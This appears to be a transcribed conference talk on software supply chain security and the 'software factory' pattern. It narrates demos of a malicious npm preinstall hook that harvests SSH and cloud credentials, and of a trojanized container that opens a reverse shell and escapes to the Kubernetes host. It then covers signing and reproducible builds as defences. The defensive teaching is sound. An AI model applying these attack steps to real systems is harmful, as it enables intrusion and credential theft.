 Hello, good morning and welcome. Very pleased to see people in person as opposed to on the other side of some amorphous internet screen. We're gonna talk about the software factory today, some supply chain fun, and yeah, thank you for coming to my talk in advance. So, Cuban let's supply chain security, the software factory, AKA who is afraid of the big bad supply chain. Hi, I'm Andy, I'm from Control Plane. We are a cloud native security consultancy. We have audit, pentest, and engineering capabilities, and I have a wonderful team. I've done lots of development, that's kind of where the background comes from. Security is a steep passion, and operations of course is necessary as the strong baseline on which to build solid security engineering practices. I am very lucky to have had the opportunity to write sans sec 584, attacking and defending containers and Kubernetes. With my preeminent co-author, Mr. Michael Hasenblas, I have written the book Hacking Kubernetes. It has gone into print today. It will be available on the ebook by the end of the week. It's already available on Early Access, and yeah, huge thanks to Michael. It is a step-by-step guide to attacking, defending, and ultimately securely deploying Kubernetes for regulated environments and everywhere else. And today, we are going to talk about the supply chain. What is it? Why is it a problem? Then we will look concretely at how to attack a couple of different supply chains, specifically at install time for a package, and secondarily, if I can get malicious code running in your Kubernetes clusters, what can I do? We will look at signing. Signing is the fated mechanism by which to fix all these things. Signing is easy, verification is hard, and finally, draw everything together with the software factory pattern. The panacea, potentially not, but certainly a useful advancement in our journey. There has been so much chat about the supply chain already at KubeCon. There was a supply chain security con on Monday. Six security, or tag security, as they are now, ran the security day yesterday. And there's so much going on in the ecosystem right now. We're really moving forward after a difficult, I guess, kind of a few years of stasis as we build out new package managers and kind of since OCI existed. So there is a lot here. I will be referencing other talks throughout. So what is a supply chain? It is anything that we depend upon. In a military context, this could be the individual nuts and bolts that go into your aircraft carriers. You're collectively, pharmaceutically, it is how we get drugs from a factory into a person without them dying from some sort of contamination on the way, same for food. Manufacturing is your kind of just-in-time Toyota-style manufacturing and software. Software is built of other pieces of software, and each of them has an independent supply chain. As a consumer, it is beyond our direct control. We have to have that trust in the previous steps. And finally, it is reliant on trust, which is never a solid thing on which to base, and so something we need to look at in depth. So for a software supply chain, any code that ends up running in production is part of the supply chain. What could possibly go wrong? We ask ourselves potentially a lot. We rely upon our producers to have done things sensibly, and we can't necessarily always validate those things that they have done. So as we move into this post bare metal, sort of cloud-native renaissance future, everything is defined as software that extends from, of course, the applications that have always been software, but the infrastructure is now programmable. Our security is now defined, and the same with policy as code. It's reproducible, it's statically analyzable, and this is really useful for us because it ensures reproducibility. It gives us the advantage of being able to test things in all sorts of different dimensions and domains. And it means that with consistency, we can apply the same style and type of controls to each of those things. So static analysis and linting is a fine example. In the Kubernetes world, everything is declarative, and therefore we can define what a good baseline state looks like and test it. So from a software factory perspective, we're potentially building anything and everything software. What could that be? Well, various different examples here. Artifacts, the actual deployment into clouds that we're doing into some of those platforms, all the way through infrastructure, and especially our security and NFRs. Importantly, if we are going to use full build automation for all of these things, which of course we should do, segregation of the build servers becomes important because the privilege afforded to a security-based build server or perhaps something that's going and rotating certificates in networking appliances, et cetera, that should probably be so isolated, segregated, and on its own managed network that it's not visible to a lot of the rest of the organization. So supply chain, everything is software. We compose software of other pieces of software and we rely upon our producers for safety. This is correct and nonviolent in the classic sense. What does that mean? Well, if we have a supply chain here with Bob in the middle, Bob, as you see, delivers Alice's code to Charlie. If Bob drops malware and implant some malicious software which does not perform the highest and best use of the infrastructure that it's on, perhaps, it's very difficult to detect. And this process of malicious supply chain insertion is something that we've seen happen more and more and increasingly becomes the new attack surface. Supply chains are very long and difficult to secure because not all of the events occurring in the supply chain are even visible to us. And when we say the new software security frontier, we're actually talking back to reflections on trusting trust, to the seminal paper on malicious compilers that build malware into that outputs. So there we are. We must essentially trust everything in a supply chain and this is where things get really difficult because if we don't trust each and every step, that's the insertion point at which stage potentially some malicious code is inserted into a compiled artifact. Very difficult to detect because you have to, perhaps reverse engineer or decompile the thing in order to understand if there's a malicious side effect from the implant, as we'll call it. There we go. The reflection on trusting trust, Mr. Thompson himself. Okay, so let's look at how to attack a supply chain. The book features an archetypal eight-bit adversary. This is Captain Hashtag and his many guises. This malicious adversary wants to run his code in our production systems. It's really that simple. It doesn't matter if that's crypto mining or popping a reverse shell, which we'll look at in a moment. Or in fact, just adding ourselves or adding our infrastructure to a command and control network. So we can use that at a later point, perhaps bounce other malicious traffic through it, we use it for something like a watering hole attack where you surface or you host malicious code on somebody else's infrastructure and so it becomes essentially a wide and recursive game. What has happened recently in the danger zone, we have had the Reval Gang attack the colonial pipeline for a provider. We've seen SolarWinds, which is kind of the canonical example at this point because the impact was so wide. When we have a highly privileged piece of software like a server monitoring agent or observability and security, those kind of tools generally need a lot of access to the underlying system. That's because necessarily they're performing a task on behalf of humans. And instead of having a human go in, kind of check the process table every so often, we have something else to do that monitoring for us. That kind of highly privileged software, if attacked, of course, then has complete control of the underlying system and can perform sort of behavioral obfuscation and kind of hide what it's actually doing. In the SolarWinds case, that was by using very similar debug style out network messages to the underlying product but just to a maliciously hosted DNS server and running command and control that way. The network effect of this, because one provider is attacked and that piece of software is installed in 50, 100, 1,000 places, it becomes a huge amplification of maliciousness perhaps. What else have we seen? CodeCov, that was attacking a CI build. And the point here as SolarWinds was, is that CI is highly privileged and therefore the software factory makes some sense as I will attempt to convince you of. Notably here, the last one as well, XcodeGhost was a concrete implementation of the reflections on the trusting trust issue which was a compiler that, it was a backdoor version of Xcode and it would compile artifacts with a command and control botnet client in it. So anybody who compiled an artifact with this and distributed it was then putting their consumers onto a botnet inadvertently. Tag security, one of my favorite places to hang out, has this useful catalog of supply chain compromises. The groups are a lot of the attacks that we've seen in the past years into Caspers. As we can see, source code is the preeminent attack path here. That means getting someone else's code into, well, getting malicious code into somebody else's repository, but hot on its heels, developer tooling. We'll look at how this works with a demo in a bit. Publishing infrastructure. At that point, of course, this is our CI CD systems. This might be, well, in fact, the next group, trust and signing as well. Getting into the publishing infrastructure and either changing the source code just before it's built. That was the SolarWinds style attack. It becomes very difficult to determine what occurred there because the compiler takes in trusted inputs on the assumption that the build server is secure. When we consider what a build server does, it's remote code execution as a service. It's running on behalf of developers in order to save them from the job of manually packaging their bits and shuffling them off somewhere else. It's necessarily highly privileged. Therein lies the attraction for an attacker. When we look at trust and signing, often that is also a function of the build server. Those keys will be available or there'll be a signing endpoint that the build server has permission to push artifacts to and receive signatures in return like a KMS system. Again, it's the process of being on the build server and in control of its behaviors that opens up these types of attacks. And of course, we can chain them together. Negligence makes an appearance. Notably, that's for a PyPy typoscoting attack. PyPy is the process of taking something like event stream with a hyphen in the middle, copying that package to event stream without the hyphen. And when developers are happily just manually defining their dependencies on the command line, both of them resolve. And the attacker keeps the malicious typoscotted secondary package up to date and then at some point decides once it's got 100,000 installs a week to add their own piece of malicious code, maybe as a transitive dependency. So it's not clear to the original package and therein lie the problems. Fortunately, the manifestations that we've seen of this so far are generally looking for crypto wallets. If they start looking for SSH keys and GPG keys, your AWS credentials, then we might see these kind of things taken a little bit more seriously. So how do we attack? Well, we can get into a developer's machine. The end user device, if it has a specific endpoint protection, may detect some of this, probably not. It's legitimate that we're using our credentials. Getting into the source repository, well, that makes some sense. It does leave a trail, of course, because we have everything as a merkle tree in Git and that means that we can't rewrite that history unless we're forced pushing. So once the attack is in there, as long as the repository has suitable, sensible branch protections, we'll be able to detect it at a later stage. The build infrastructure, of course, we've been talking about this. Hosted build infrastructure still suffers the same problems. It's a question of access and we'll look at how to detect compromises of build infrastructure as we progress or we go into the trusted supply chain. We move backwards from what the developers doing in their repository and we say, okay, well, you're putting in this dependency. I'll attack that dependency or that dependency is pulling in yet another dependency. That's where we'll start. Any of these things can run code and if we consider where we might want to put that code, it doesn't matter. We can put it into the test suite. A test suite while it may be exercising the underlying code also has the ability to just dump environment variables, read things from disk, push off the DNS servers. We've also got the potential for command control even if we're restricting what we allow into our organization, places like GitHub and Docker Hub, image registries, we can publish to those as well. So even running air gap to offline infrastructure poses some sort of problem without being very strict and I say air gap in the cloud sense, very strict and doing things like running split horizon DNS. So really just keeping this code out of production is the first line of defense. Finally, of course, we can actually attack for runtime environment, which is to say, well, everybody is using, for example, Debian or Ubuntu, let's attack one of the common packages in there. Fortunately, that is significantly more difficult because we have a lot more eyes on that code. Open source has a variance of how many people are taking the supply chain security seriously and fortunately, there's been a lot of effort put into things like reproducible builds and of course, the fact that there are a lot of trusted maintainers who are known individuals in those domains. So in sort of order of difficulty, it's certainly the most difficult. We have had Salsa released recently which is a supply chain security framework. It does base a lot of its assumptions on the fact that your build server is not already compromised. If it is, a lot of these things fall down, but this is an example of various places you can attack a build. Obviously, if we bypass the code review or we don't have four eyes, as in a secondary individual merging code, there's potential for any old junk to be committed. We can compromise source control. Of course, again, we're leaving some evidence for what we've done there. Modified after source control, but that's a bit more interesting. That's our SolarWinds style attack. Compromise the build platform. Again, we're in a very difficult situation when trusted infrastructure is compromised. Bad dependencies, yes, bypassing CIC deals together. So just pushing straight into a package registry. Arguably you could do that by getting onto the build server and exploiting those credentials. You generally need a network route to do that, of course. And yeah, bypassing, compromising and bad packages. Okay, so let's put some meat on these bones. If we have an application dependency that we install from the internet onto our device in the process of building software, perfectly legitimate use, we can potentially have that run malware. And I'll give you a quick example here. Let me see, game over approaching. So, how are we doing? Let's make that simpler. Right, so what we've got here is an MPM package. And as you can see in the package itself, it's an MPM malicious implant example and we have this marvelous pre-install hook. This means that before the package does anything, it runs arbitrary code. Who's looking after that code when it's pushed into MPM? It's not us, that's for sure. So hypothetically, we're just pulling a package, especially if we're looking at something that's been typosquotted, we might expect this to be legitimate. And we'll just do an MPM install in our local directory. And this is my example script. What can we do? Well, we've got the permissions of the user running the script here. These are, I mean, yes, we could do a denial of wallet attack on someone's laptop, that's probably not very sensible, but these are bits of credentials, truncated bits and credentials for my SSH directory and my cloud providers. And this is a very real concern. Operations engineers may have innumerable different Kubernetes clusters listed in their Kube config. So this is a very difficult thing to protect against. There's no malware detection, there's no antivirus that will stop and install performing local file system actions. That's the point, that's what it's there to do. So that is the first attempt. What can we actually do here? Well, 2FA really is the defense. There's a reason that we put passwords and things, that we have Yubiquis and we have physical auth tokens, because otherwise these things are very easy to exfiltrate. Plain text credentials, yes, of course. Crypto wallets really are the main target of all of these attacks at the moment. So if you have money in them, I'm sure you know how to look after them and air gap developments. Okay, let's look at a different demo now in Kubernetes itself. So the principle here is that I, as an attacker, have managed to get you to run something in production that contains my code. There's a few ways to do this. It could be an Easter egg style attack where it requires some form of trigger, maybe that's the time and date, maybe it's an identifier in the cluster itself. And the idea is that I sit on the internet with an open port that's linked through to my machine. I get the malicious image, and actually there's a wonderful way to do this with an app called DockerScan, that will trojanize applications just by messing with the LD preload. So you can't even see the thing happening in the container itself. In the containers file system startup, it's metadata in the OCI image. And so what this does is when the container starts, it fires a reverse shell, and it's called a reverse shell because you're going back to an attacker controlled endpoint from inside the infrastructure back out. So it punches through firewalls of course, because if you have internet access, you're just going to resolve a host and port combination. And then I'm listening on the other end. Let's have a look at how this works. In order to get the reverse shell, this is a prayer to the wifi gods, incidentally. In order to get the reverse shell, we use something called ngrok, which is just free TCP forwarding. So that's opening a tunnel. What we've got here is a local listener. So that's just running Ncat here locally. And that won't do anything until we have done this. So what we're going to do here is just create a pod. That pod is running this reverse shell to the resolved IP of the ngrok tunnel that we've just opened. This is the joy of having bash in your containers, because you've got this virtual dev TCP endpoint that we can use for nefarious activities such as this. Then we do a dynamic rewrite. So let's enable hostpids. Let's make ourselves privileged. And with those two things, we can either remount the host file system into the container, or we can nsenter the host namespaces. And let's, obviously in this situation, I am privileged and that I already have the capacity to very slowly potentially deploy to the cluster. Let's see if that actually does everything. Yes, eventually. Okay, so let's run this. It will spit out the YAML that it runs as well. And you can see because this is a public IP, people are scanning this range and somebody's just tried to connect to my laptop. Oh, wonderful. And terminated this command doesn't look good. Okay, so that's halfway there because there's new lines, nice. There we go. So what have we done? We've just dynamically created a reverse shell to the endpoint that we've created here. We have lubbed a privileged security context in and enabled hostpids. And there we go, there's the reverse shell. So what does this mean? Well, I'm now inside a container in your infrastructure because you ran a thing that I hid a backdoor in, essentially. And from here, of course, we've got the canonical what is available. Let's map, well, we know that we're, we know that we're in a privileged container because dev is unmasked. We can see all the things in here. And because we can use DF to see where Etsy host is mounted in by the container runtime, that's leaked the name of the underlying disk. And then we can remount that into, whoops, it's a daisy. Draughts. Okay, I'm just gonna do that again for the sake of actually finishing that demo because I managed to close the window. So if I just delete that deployment and then rerun the shell catcher. So that's now opening another public IP and port combination. Then I'll rerun this and I expect that also to, there we go. And that then fires this. Okay, so as we were, we can see, let's remount this into amount endpoint. And then we can see, so that's the host file system. And from here, we can do whatever we like. We can go and exfiltrate thing. We can pull the authorized key, well, we can pull any private keys that are sat in the host file system. We can add our own keys into authorized keys if we want to get there. We can also secure it by this route, fire off another persistence, reverse shell, and just jump straight in. It's game over for that node. Without node authorization, it's game over for the cluster. And if there are any privileged workload integrations, it might be game over for the cloud account. Okay, so that's what happened. We went outbound to the developers, sorry, to the, so from my machine, I created that public socket. I ran the implant, which then connected back to it. And then I've got essentially a command control session, a reverse shell into the victim. The point here is that we do not want, under any circumstances, that to happen. There are ways around this. We've got things like Trivi to scan our images, which should prevent some of these things. Of course, we need somebody to detect a malicious image in the first place. Obviously we want security context. Let's build time behavioral analysis that we can do. And the EBPF, of course, is the buzzword and the thing that will help us to do that. Okay, so let's move on into the last section of the software factory, looking at policy and attestation. As we've said, signing is the easy part. Verification is more difficult. Mike and Tim from Citibank did a great demo, yes, the old Monday actually, a supply chain security con with a modern implementation of the reflections on trusting trust attack that is going into the build server and swapping things out. And looking at how we can use cosine, which is part of the stick store suite of tools to protect against that. Yes, and that demo is, there we go, Sloan's loading, that demo is available. I think the videos for that will be out in a couple of weeks and well worth a watch. Okay, so looking at all those problems, how do we fix them? Signing is the way. We take a public and private key pair, we use some data and we create a signature that can then be revalidated at related dates with the public key. In terms of build server attestation and security, we can also sign each individual build step. Now this gets difficult because we need to know that the inputs and the outputs stay consistent. If we're performing a transpilation or compilation step in the middle, then we're just signing the fact that a build step occurred. This is better than nothing, but still there are constraints to what you can do. InToto is the facto tool to do this. It's integrated and detect on chains at this point and there's a lot of work ongoing in there as well. We can also sign container images. So we've got those individual signatures for the build stages that creates an artifact. That artifact is then trusted in inverted commas and we can then go and sign the thing. So again, we can revalidate that at a later date and six-door and notary v2 are the emergent forerunners in this space to effectively sign our artifacts. Recall as a transparency log operates in the same way as the let's encrypt style of certificate transparency log where all our metadata is put somewhere public so that anybody can revalidate it at the later stage and be sure that it was us doing the thing to the artifact. There's all sorts of different parts of six-door. The maintainers have just started a company around this as well. They have a booth here somewhere. They are called Chain Guard and Well Worth Conversation. And I've got a quote from Mike himself here. Software does not compromise itself. It's humans that are the problem and if companies don't publicly provide transparency into what is inside their compiled artifact, so what happened in the build? This is the software bill of materials that again, there is a lot of conversation about this week. If, I mean, perhaps it's the one I need to say, but if you've got nothing to hide, you've got nothing to fear or something around that. Ultimately, we want to know if somebody ships us a binary artifact with a compromised packaging because we want to upgrade that when there's a zero-day released for a dependency that's packaged and deployed in our systems, we deserve to know so we can take remediative action. Okay, so underpinning all of these things is a question of identity. Spliffy and other CNCF projects is ephemeral workload identity. This gives us, it signs a certificate containing metadata about a process. And with a very short expiration, that can be used as the root of trust of signing. It can be used as an identity. Istio uses this concept for mutual TLS for workload identity. And it's incredibly powerful. All of these projects are kind of being smushed together in this concept of a software factory in order to give us, and in Toto Golang is, again, another integration in order to give us this kind of end-to-end signing. And this takes us to the software factory. So what is this? It is building pipelines that build other pipelines so that our DevOps is strong. That is Bertha, the 1980s children's TV show in the UK. And it means that we have a strong baseline of DevOps skills, if you like, and the ability to stand up new infrastructure very quickly, aggressive automation, and it welcomes signing approaches. So there's lots of different moving parts. It is a large, complex, not intractable problem with a lot of different organizations working to deliver a sort of canonical implementation. The Department of Defense is one of those organizations. They have built a reference design. It doesn't come with an implementation. It's a white paper, so a control plane and colleagues at Citibank and the tax security supply chain working group are looking to build out a concrete implementation based upon these things. And of course, underpinning everything is this concept of rigorous automation. The reference architecture, I apologize for the slow image loading on these. Okay, so what we're looking at here is a subdivision of different trust domains and in the bottom corner, we've got the source control and in the bottom green box, we see an identity attester that is a privileged process that is looking at metadata about processes running on the same system in order to uniquely identify it, attest to its identity and then provide that as the root of identity with which to mint a certificate. I'm sure there's a nice image there. Okay, so the trick here, oh, all right, so just to roll back slightly. So different views on the software factory architecture here. What we're looking at here is a Kubernetes system running Tecton, the distributed build system that's actually underpinning Jenkins X2, I think they've moved onto it. There is an assumption here that the cluster is secured, that the infrastructure, that the SREs, that people with access to it, it's all locked down. Once that assumption is valid, then we see we have Tecton here which is able to perform these individual task runs which are our build steps. Tecton chains ensures that the steps are run, generates that signature and pushes it out to the signature store and recall. So again, that's the public transparency log and an evidence lake of some description. And then we see we have also got our signing key in order to get that S-vid. And at the top we have Spire, which is that workload identity, it's that dynamic attestation which mints certificates for us to use in signing. None of this solves the problem of compromised build infrastructure. So how do we fix malicious SREs or underlying maybe the supply chain attack against our hosting provider? The trick is to run it twice in different places. This is already done by the Intoto project which supports, well, Intoto supports this. This is how our operating systems build packages, globally distributed builds. The idea being if one of those builds is compromised and we have reproducibility for all the artifacts that we build, we compare the hashes and if the hashes don't line up, something's changed. That might be non-determinism in the build, that might be the introduction of temporal data or change of locale so things are ordered differently on disk, they go into a compressed artifact and they have a different order and so it's a different hash. But on the assumption that those things are normalized and we actually have full reproducibility of the artifacts that we build, this is the de facto mechanism by which to detect compromised build infrastructure. Going all the way back to the software factory pattern, the software factory should be able to build itself, it should be able to recover from disaster effectively and it should be able to build other types of pipeline very effectively as well. Once that level of automation and sort of rigor has been achieved, this becomes a natural extension. Up until that point, there is a lot of work, it's difficult to front load this kind of effort and I'm not gonna try and say that it's not but once we have that solid baseline, the evidence lake becomes a comparative place where we can essentially detect signals of compromise in a way that's very difficult to do otherwise as we've seen. The six store group have put together this and Dan Lawrence is here as well, put together an excellent white paper if you'd like to read more on that. That is the end, that is Captain Hashjack and thank you very much for your attention.